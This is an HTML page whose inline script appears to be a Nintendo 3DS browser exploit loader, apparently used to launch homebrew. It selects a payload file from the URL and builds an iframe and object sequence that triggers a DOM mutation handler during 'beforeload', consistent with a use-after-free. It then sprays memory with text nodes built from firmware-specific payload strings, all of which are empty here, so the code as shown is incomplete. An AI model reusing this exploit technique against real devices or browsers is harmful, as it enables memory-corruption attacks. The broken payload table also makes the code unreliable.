<html><head><script>
d=document,r=parent,w=window,n=navigator.userAgent;
if(r==w){
	l='arm.dat',u=decodeURI(d.URL),g=u.split('?');
	if(g.length>1){
		g=g[1].split('&');
		if(g[0].length>0&&g[0].length<25)l=g[0];
	}
	d.title='Load '+l;
	w.onload=function(){
		if(n.indexOf('1.7538.CN')>=0)n=n.replace('.CN',confirm('系统版本4.2-4.4选择OK，系统版本4.5选择取消。')?'.CN.42':'.CN.45');
		d.body.childNodes[0].innerHTML=l+' loading<iframe height=0 src=#/>';
	}
}else{
	w.onload=function(){
		b=0,f=w.frameElement,p=f.parentNode,o=d.createElement('object');
		o.addEventListener('beforeload',function(){
			if(++b==1)p.addEventListener('DOMSubtreeModified',r.z);
			else if(b==2)p.removeChild(f);
		});
		d.body.appendChild(o);
	}
}
function z(){
	if(n.indexOf('Nintendo 3DS')>=0){
		m=[],q={'17412':'',
			'17455':'',
			'17498':'',
			'17538C42':'',
			'17538C45':'',
			'17538K':'',
			'17538T':'',
			'17552':'',
			'17552C':'',
			'17552K':'',
			'17552T':'',
			'17567':'',
			'17567C':'',
			'17567K':'',
			'17567T':''
		}[n.split('/').pop().replace(/[^\dCKT]/g,'')],
		s=q.indexOf("dmc:/")+5;
		q=q.substring(0,s)+l+"\0"+q.slice(s+l.length+1);
		q+=Array(384-q.length+1+1).join('\0');
		for(j=1;j<410;j++){
			i=j/96,a=Array(j);
			for(k=0;k<i;a[k++]=q);
			m.push(d.createTextNode(String.fromCharCode.apply(null,Array(a))));
		}
	}
}</script></head><body><h1>.</h1></body></html>
